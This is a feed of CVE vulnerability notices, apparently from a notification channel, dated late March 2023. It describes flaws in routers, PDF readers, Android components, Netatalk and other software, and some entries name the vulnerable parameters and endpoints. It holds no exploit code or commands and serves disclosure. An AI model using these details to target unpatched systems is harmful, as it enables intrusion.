🚨 CVE-2022-42431This vulnerability allows local attackers to escalate privileges on affected Tesla vehicles. An attacker must first obtain the ability to execute privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the bcmdhd driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-17544.🎖@cveNotify |
|
| 2023-03-29 21:29:49 |
🚨 CVE-2022-43617This vulnerability allows remote attackers to execute arbitrary code on affected installations of Corel CorelDRAW Graphics Suite 23.5.0.506. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PCX files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-16372.🎖@cveNotify |
|
| 2023-03-29 21:29:48 |
🚨 CVE-2022-43631This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-1935 1.03 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of SetVirtualServerSettings requests to the web management portal. When parsing subelements within the VirtualServerInfo element, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-16151.🎖@cveNotify |
|
| 2023-03-29 21:29:44 |
🚨 CVE-2022-43632This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-1935 1.03 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of SetQoSSettings requests to the web management portal. When parsing subelements within the QoSInfo element, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-16153.🎖@cveNotify |
|
| 2023-03-29 21:29:43 |
🚨 CVE-2022-43634This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the dsi_writeinit function. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-17646.🎖@cveNotify |
|
| 2023-03-29 21:29:42 |
🚨 CVE-2022-43637This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader 12.0.1.12430. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18626.🎖@cveNotify |
|
| 2023-03-29 21:29:41 |
🚨 CVE-2022-43639This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader 12.0.1.12430. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18628.🎖@cveNotify |
|
| 2023-03-29 21:29:38 |
🚨 CVE-2022-43640This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader 12.0.1.12430. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. Crafted data in a PDF file can trigger a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-18629.🎖@cveNotify |
|
| 2023-03-29 21:29:37 |
🚨 CVE-2022-43642This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-825 1.0.9/EE routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the YouTube plugin for the xupnpd service, which listens on TCP port 4044. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-19222.🎖@cveNotify |
|
| 2023-03-29 21:29:36 |
🚨 CVE-2022-43644This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-825 1.0.9/EE routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Dreambox plugin for the xupnpd service, which listens on TCP port 4044. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-19461.🎖@cveNotify |
|
| 2023-03-29 19:30:02 |
🚨 CVE-2023-26290Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Forcepoint Cloud Security Gateway (CSG) Portal on Web Cloud Security Gateway, Email Security Cloud (login_reset_request.mhtml modules), Forcepoint Web Security Portal on Hybrid (login_reset_request.mhtml modules) allows Reflected XSS.This issue affects Cloud Security Gateway (CSG): before 03/29/2023; Web Security: before 03/29/2023.🎖@cveNotify |
|
| 2023-03-29 19:30:01 |
🚨 CVE-2023-26291Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Forcepoint Cloud Security Gateway (CSG) Portal on Web Cloud Security Gateway, Email Security Cloud (login_form.mhtml modules), Forcepoint Web Security Portal on Hybrid (login_form.mhtml modules) allows Reflected XSS.This issue affects Cloud Security Gateway (CSG): before 03/29/2023; Web Security: before 03/29/2023.🎖@cveNotify |
|
| 2023-03-29 19:30:00 |
🚨 CVE-2023-26968In Atrocore 1.5.25, the Create Import Feed option with glyphicon-glyphicon-paperclip function is vulnerable to Unauthenticated File upload.🎖@cveNotify |
|
| 2023-03-29 19:29:59 |
🚨 CVE-2023-27167Suprema BioStar 2 v2.8.16 was discovered to contain a SQL injection vulnerability via the values parameter at /users/absence?search_month=1.🎖@cveNotify |
|
| 2023-03-29 19:29:55 |
🚨 CVE-2023-21014In multiple locations of p2p_iface.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-257029326🎖@cveNotify |
|
| 2023-03-29 19:29:54 |
🚨 CVE-2023-21013In forceStaDisconnection of hostapd.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-256818945🎖@cveNotify |
|
| 2023-03-29 19:29:53 |
🚨 CVE-2023-21012In multiple locations of p2p_iface.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-257029812🎖@cveNotify |
|
| 2023-03-29 19:29:52 |
🚨 CVE-2019-1973A vulnerability in the web portal framework of Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based interface. The vulnerability is due to improper input validation of log file content stored on the affected device. An attacker could exploit this vulnerability by modifying a log file with malicious code and getting a user to view the modified log file. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or to access sensitive, browser-based information.🎖@cveNotify |
|
| 2023-03-29 19:29:51 |
🚨 CVE-2019-1956A vulnerability in the web-based interface of the Cisco SPA112 2-Port Phone Adapter could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against another user of the device. The vulnerability is due to insufficient validation of user-supplied input by the web-based interface of the affected device. An attacker could exploit this vulnerability by inserting malicious code in one of the configuration fields. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2023-03-29 19:29:47 |
🚨 CVE-2019-1958A vulnerability in the web-based management interface of Cisco HyperFlex Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user.🎖@cveNotify |
|
| 2023-03-29 19:29:46 |
🚨 CVE-2019-1955A vulnerability in the Sender Policy Framework (SPF) functionality of Cisco AsyncOS Software for Cisco Email Security Appliances (ESA) could allow an unauthenticated, remote attacker to bypass configured user filters on the device. The vulnerability is due to incomplete input and validation checking mechanisms for certain SPF messages that are sent to an affected device. An attacker could exploit this vulnerability by sending a customized SPF packet to an affected device. A successful exploit could allow the attacker to bypass the header filters that are configured for the affected device, which could allow malicious content to pass through the device.🎖@cveNotify |
|
| 2023-03-29 19:29:45 |
🚨 CVE-2019-6159A stored cross-site scripting (XSS) vulnerability exists in various firmware versions of the legacy IBM System x IMM (IMM v1) embedded Baseboard Management Controller (BMC). This vulnerability could allow an unauthenticated user to cause JavaScript code to be stored in the IMM log which may then be executed in the user's web browser when IMM log records containing the JavaScript code are viewed. The JavaScript code is not executed on IMM itself. The later IMM2 (IMM v2) is not affected.🎖@cveNotify |
|
| 2023-03-29 19:29:44 |
🚨 CVE-2019-15232Live555 before 2019.08.16 has a Use-After-Free because GenericMediaServer::createNewClientSessionWithId can generate the same client session ID in succession, which is mishandled by the MPEG1or2 and Matroska file demultiplexors.🎖@cveNotify |
|
| 2023-03-29 19:29:40 |
🚨 CVE-2019-3744Dell/Alienware Digital Delivery versions prior to 4.0.41 contain a privilege escalation vulnerability. A local non-privileged malicious user could exploit a Universal Windows Platform application by manipulating the install software package feature with a race condition and a path traversal exploit in order to run a malicious executable with elevated privileges.🎖@cveNotify |
|
| 2023-03-29 19:29:39 |
🚨 CVE-2019-5631The Rapid7 InsightAppSec broker suffers from a DLL injection vulnerability in the 'prunsrv.exe' component of the product. If exploited, a local user of the system (who must already be authenticated to the operating system) can elevate their privileges with this vulnerability to the privilege level of InsightAppSec (usually, SYSTEM). This issue affects version 2019.06.24 and prior versions of the product.🎖@cveNotify |
|
| 2023-03-29 19:29:38 |
🚨 CVE-2023-21011In multiple locations of p2p_iface.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-257029912🎖@cveNotify |
|
| 2023-03-29 19:29:37 |
🚨 CVE-2019-14783On Samsung mobile devices with N(7.x), and O(8.x), P(9.0) software, FotaAgent allows a malicious application to create privileged files. The Samsung ID is SVE-2019-14764.🎖@cveNotify |
|
| 2023-03-29 19:29:36 |
🚨 CVE-2019-12805NCSOFT Game Launcher, NC Launcher2 2.4.1.691 and earlier versions have a vulnerability in the custom protocol handler that could allow remote attacker to execute arbitrary command. User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. This can be leveraged for code execution in the context of the current user.🎖@cveNotify |
|
| 2023-03-29 16:29:55 |
🚨 CVE-2023-26982Trudesk v1.2.6 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Tags parameter under the Create Ticket function.🎖@cveNotify |
|
| 2023-03-29 16:29:54 |
🚨 CVE-2023-21000In MediaCodec.cpp, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-194783918🎖@cveNotify |
|
| 2023-03-29 16:29:53 |
🚨 CVE-2023-21001In onContextItemSelected of NetworkProviderSettings.java, there is a possible way for users to change the Wi-Fi settings of other users due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-237672190🎖@cveNotify |
|
| 2023-03-29 16:29:49 |
🚨 CVE-2022-30699NLnet Labs Unbound, up to and including version 1.16.1, is vulnerable to a novel type of the "ghost domain names" attack. The vulnerability works by targeting an Unbound instance. Unbound is queried for a rogue domain name when the cached delegation information is about to expire. The rogue nameserver delays the response so that the cached delegation information is expired. Upon receiving the delayed answer containing the delegation information, Unbound overwrites the now expired entries. This action can be repeated when the delegation information is about to expire making the rogue delegation information ever-updating. From version 1.16.2 on, Unbound stores the start time for a query and uses that to decide if the cached delegation information can be overwritten.🎖@cveNotify |
|
| 2023-03-29 16:29:48 |
🚨 CVE-2020-28935NLnet Labs Unbound, up to and including version 1.12.0, and NLnet Labs NSD, up to and including version 4.3.3, contain a local vulnerability that would allow for a local symlink attack. When writing the PID file, Unbound and NSD create the file if it is not there, or open an existing file for writing. In case the file was already present, they would follow symlinks if the file happened to be a symlink instead of a regular file. An additional chown of the file would then take place after it was written, making the user Unbound/NSD is supposed to run as the new owner of the file. If an attacker has local access to the user Unbound/NSD runs as, she could create a symlink in place of the PID file pointing to a file that she would like to erase. If then Unbound/NSD is killed and the PID file is not cleared, upon restarting with root privileges, Unbound/NSD will rewrite any file pointed at by the symlink. This is a local vulnerability that could create a Denial of Service of the system Unbound/NSD is running on. It requires an attacker having access to the limited permission user Unbound/NSD runs as and point through the symlink to a critical file on the system.🎖@cveNotify |
|
| 2023-03-29 16:29:47 |
🚨 CVE-2023-21067Product: AndroidVersions: Android kernelAndroid ID: A-254114726References: N/A🎖@cveNotify |
|
| 2023-03-29 16:29:44 |
🚨 CVE-2023-20998In multiple locations, there is a possible way to trigger a persistent reboot loop due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-246749936🎖@cveNotify |
|
| 2023-03-29 16:29:43 |
🚨 CVE-2023-21061Product: AndroidVersions: Android kernelAndroid ID: A-229255400References: N/A🎖@cveNotify |
|
| 2023-03-29 16:29:42 |
🚨 CVE-2023-28332If the algebra filter was enabled but not functional (eg the necessary binaries were missing from the server), it presented an XSS risk.🎖@cveNotify |
|
| 2023-03-29 16:29:38 |
🚨 CVE-2023-20910In addNetworkSuggestions of WifiManager.java, there is a possible way to trigger permanent DoS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-245299920🎖@cveNotify |
|
| 2023-03-29 16:29:37 |
🚨 CVE-2023-20911In addPermission of PermissionManagerServiceImpl.java , there is a possible failure to persist permission settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-242537498🎖@cveNotify |
|
| 2023-03-29 16:29:36 |
🚨 CVE-2023-1610A vulnerability, which was classified as critical, has been found in Rebuild up to 3.2.3. Affected by this issue is some unknown functionality of the file /project/tasks/list. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-223742 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-29 15:29:42 |
🚨 CVE-2023-27857In affected versions, a heap-based buffer over-read condition occurs when the message field indicates more data than is present in the message field in Rockwell Automation's ThinManager ThinServer. An unauthenticated remote attacker can exploit this vulnerability to crash ThinServer.exe due to a read access violation.🎖@cveNotify |
|
| 2023-03-29 15:29:41 |
🚨 CVE-2020-36691An issue was discovered in the Linux kernel before 5.8. lib/nlattr.c allows attackers to cause a denial of service (unbounded recursion) via a nested Netlink policy with a back reference.🎖@cveNotify |
|
| 2023-03-29 15:29:40 |
🚨 CVE-2021-3674A flaw was found in rizin. The create_section_from_phdr function allocates space for ELF section data by processing the headers. Crafted values in the headers can cause out of bounds reads, which can lead to memory corruption and possibly code execution through the binary object's callback function.🎖@cveNotify |
|
| 2023-03-29 13:29:44 |
🚨 CVE-2023-1509The GMAce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.2. This is due to missing nonce validation on the gmace_manager_server function called via the wp_ajax_gmace_manager AJAX action. This makes it possible for unauthenticated attackers to modify arbitrary files and achieve remote code execution via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-03-29 13:29:39 |
🚨 CVE-2022-36429A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.🎖@cveNotify |
|
| 2023-03-29 13:29:38 |
🚨 CVE-2022-37337A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-03-29 13:29:37 |
🚨 CVE-2022-38452A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-03-29 13:29:36 |
🚨 CVE-2023-1689A vulnerability classified as problematic was found in SourceCodester Earnings and Expense Tracker App 1.0. This vulnerability affects unknown code of the file Master.php?a=save_earning. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-224308.🎖@cveNotify |
|
| 2023-03-29 11:29:36 |
🚨 CVE-2023-1682A vulnerability has been found in Xunrui CMS 4.61 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /dayrui/My/Config/Install.txt. The manipulation leads to direct request. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224239.🎖@cveNotify |
|
| 2023-03-29 11:29:35 |
🚨 CVE-2023-1683A vulnerability was found in Xunrui CMS 4.61 and classified as problematic. Affected by this issue is some unknown functionality of the file /dayrui/Fcms/View/system_log.html. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224240.🎖@cveNotify |
|
| 2023-03-29 05:29:43 |
🚨 CVE-2023-28371In Stellarium through 1.2, attackers can write to files that are typically unintended, such as ones with absolute pathnames or .. directory traversal.🎖@cveNotify |
|
| 2023-03-29 05:29:42 |
🚨 CVE-2023-21039In dumpstateBoard of Dumpstate.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-263783650References: N/A🎖@cveNotify |
|
| 2023-03-29 05:29:41 |
🚨 CVE-2023-21032In _ufdt_output_node_to_fdt of ufdt_convert.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-248085351🎖@cveNotify |
|
| 2023-03-29 05:29:38 |
🚨 CVE-2023-21031In Display::setPowerMode of HWC2.cpp, there is a possible out of bounds read due to a race condition. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-242688355🎖@cveNotify |
|
| 2023-03-29 05:29:37 |
🚨 CVE-2023-21034In multiple functions of SensorService.cpp, there is a possible access of accurate sensor data due to a permissions bypass. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-230358834🎖@cveNotify |
|
| 2023-03-29 05:29:36 |
🚨 CVE-2023-21033In addNetwork of WifiManager.java, there is a possible way to trigger a persistent DoS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-244713323🎖@cveNotify |
|
| 2023-03-29 05:29:35 |
🚨 CVE-2023-1682A vulnerability has been found in Xunrui CMS 4.61 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /dayrui/My/Config/Install.txt. The manipulation leads to direct request. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224239.🎖@cveNotify |
|
| 2023-03-29 01:29:45 |
🚨 CVE-2023-27232TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wanStrategy parameter at /setting/setWanIeCfg.🎖@cveNotify |
|
| 2023-03-29 01:29:44 |
🚨 CVE-2022-45460Multiple Xiongmai NVR devices, including MBD6304T V4.02.R11.00000117.10001.131900.00000 and NBD6808T-PL V4.02.R11.C7431119.12001.130000.00000, allow an unauthenticated and remote user to exploit a stack-based buffer overflow and crash the web server, resulting in a system reboot. An unauthenticated and remote attacker can execute arbitrary code by sending a crafted HTTP request that triggers the overflow condition via a long URI passed to a sprintf call. NOTE: this is different than CVE-2018-10088, but this may overlap CVE-2017-16725.🎖@cveNotify |
|
| 2023-03-29 01:29:43 |
🚨 CVE-2022-46397FP.io VPP (Vector Packet Processor) 22.10, 22.06, 22.02, 21.10, 21.06, 21.01, 20.09, 20.05, 20.01, 19.08, and 19.04 Generates a Predictable IV with CBC Mode.🎖@cveNotify |
|
| 2023-03-29 01:29:40 |
🚨 CVE-2023-1677A vulnerability was found in DriverGenius 9.70.0.346. It has been rated as problematic. Affected by this issue is the function 0x9c40a0c8/0x9c40a0dc/0x9c40a0e0/0x9c40a0d8/0x9c4060d4/0x9c402004/0x9c402088/0x9c40208c/0x9c4060d0/0x9c4060cc/0x9c4060c4/0x9c402084 in the library mydrivers64.sys of the component IOCTL Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-224234 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-29 01:29:39 |
🚨 CVE-2023-1678A vulnerability classified as critical has been found in DriverGenius 9.70.0.346. This affects the function 0x9C40A0D8/0x9C40A0DC/0x9C40A0E0 in the library mydrivers64.sys of the component IOCTL Handler. The manipulation leads to memory corruption. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224235.🎖@cveNotify |
|
| 2023-03-29 01:29:38 |
🚨 CVE-2023-27229TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the upBw parameter at /setting/setWanIeCfg.🎖@cveNotify |
|
| 2023-03-29 01:29:37 |
🚨 CVE-2023-27231TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the downBw parameter at /setting/setWanIeCfg.🎖@cveNotify |
|
| 2023-03-28 20:29:56 |
🚨 CVE-2022-24352This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link AC1750 prior to 211210 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the NetUSB.ko kernel module. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15773.🎖@cveNotify |
|
| 2023-03-28 20:29:52 |
🚨 CVE-2022-24353This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link AC1750 1.1.4 Build 20211022 rel.59103(5553) routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the NetUSB.ko module. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the root user. Was ZDI-CAN-15769.🎖@cveNotify |
|
| 2023-03-28 20:29:51 |
🚨 CVE-2022-24673This vulnerability allows remote attackers to execute arbitrary code on affected installations of Canon imageCLASS MF644Cdw 10.02 printers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the SLP protocol. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15845.🎖@cveNotify |
|
| 2023-03-28 20:29:50 |
🚨 CVE-2022-24674This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Canon imageCLASS MF644Cdw 10.02 printers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the privet API. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15834.🎖@cveNotify |
|
| 2023-03-28 20:29:49 |
🚨 CVE-2022-24907This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader 11.1.0.52543. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 images. Crafted data in a JP2 image can trigger a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-16186.🎖@cveNotify |
|
| 2023-03-28 20:29:45 |
🚨 CVE-2022-24972This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of TP-Link TL-WR940N 3.20.1 Build 200316 Rel.34392n (5553) routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of proper access control. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-13911.🎖@cveNotify |
|
| 2023-03-28 20:29:44 |
🚨 CVE-2022-24973This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link TL-WR940N 3.20.1 Build 200316 Rel.34392n (5553) routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-13992.🎖@cveNotify |
|
| 2023-03-28 20:29:43 |
🚨 CVE-2023-27247An issue in Cynet Client Agent v4.6.0.8010 allows attackers with Administrator rights to disable the EDR functions via disabling process privilege tokens.🎖@cveNotify |
|
| 2023-03-28 20:29:39 |
🚨 CVE-2022-0194This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ad_addcomment function. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15876.🎖@cveNotify |
|
| 2023-03-28 20:29:38 |
🚨 CVE-2022-0650This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link TL-WR940N 3.20.1 Build 200316 Rel.34392n (5553) routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-13993.🎖@cveNotify |
|
| 2023-03-28 20:29:37 |
🚨 CVE-2022-1229This vulnerability allows remote attackers to execute arbitrary code on affected installations of Bentley MicroStation CONNECT 10.16.2.034. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of IFC files. Crafted data in an IFC file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-16581.🎖@cveNotify |
|
| 2023-03-28 20:29:36 |
🚨 CVE-2022-1230This vulnerability allows local attackers to execute arbitrary code on affected installations of Samsung Galaxy S21 prior to 4.5.40.5 phones. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of redirections. An attacker can force a redirection to a site that serves malicious content. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute arbitrary code in the context of the current user. Was ZDI-CAN-15918.🎖@cveNotify |
|
| 2023-03-28 20:29:35 |
🚨 CVE-2022-23121This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the parse_entries function. The issue results from the lack of proper error handling when parsing AppleDouble entries. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15819.🎖@cveNotify |
|
| 2023-03-28 18:29:39 |
🚨 CVE-2023-28119The crewjam/saml go library contains a partial implementation of the SAML standard in golang. Prior to version 0.4.13, the package's use of `flate.NewReader` does not limit the size of the input. The user can pass more than 1 MB of data in the HTTP request to the processing functions, which will be decompressed server-side using the Deflate algorithm. Therefore, after repeating the same request multiple times, it is possible to achieve a reliable crash since the operating system kills the process. This issue is patched in version 0.4.13.🎖@cveNotify |
|
| 2023-03-28 18:29:38 |
🚨 CVE-2022-27280InHand Networks InRouter 900 Industrial 4G Router before v1.0.0.r11700 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the web_exec parameter at /apply.cgi.🎖@cveNotify |
|
| 2023-03-28 17:30:07 |
🚨 CVE-2023-25654baserCMS is a Content Management system. Prior to version 4.7.5, there is a Remote Code Execution (RCE) Vulnerability in the management system of baserCMS. Version 4.7.5 contains a patch.🎖@cveNotify |
|
| 2023-03-28 17:30:06 |
🚨 CVE-2023-25596A vulnerability exists in ClearPass Policy Manager that allows for an attacker with administrative privileges to access sensitive information in a cleartext format. A successful exploit allows an attacker to retrieve information which could be used to potentially gain further access to network services supported by ClearPass Policy Manager.🎖@cveNotify |
|
| 2023-03-28 17:30:05 |
🚨 CVE-2023-20952In A2DP_BuildCodecHeaderSbc of a2dp_sbc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-186803518🎖@cveNotify |
|
| 2023-03-28 17:30:04 |
🚨 CVE-2022-28497TOTOLink outdoor CPE CP900 V6.3c.566_B20171026 is discovered to contain a command injection vulnerability in the mtd_write_bootloader function via the filename parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.🎖@cveNotify |
|
| 2023-03-28 17:30:00 |
🚨 CVE-2023-27977A CWE-345: Insufficient Verification of Data Authenticity vulnerability exists in the Data Server that could cause access to delete files in the IGSS project report directory, this could lead to loss of data when an attacker sends specific crafted messages to the Data Server TCP port. Affected Products: IGSS Data Server(IGSSdataServer.exe)(V16.0.0.23040 and prior), IGSS Dashboard(DashBoard.exe)(V16.0.0.23040 and prior), Custom Reports(RMS16.dll)(V16.0.0.23040 and prior).🎖@cveNotify |
|
| 2023-03-28 17:29:59 |
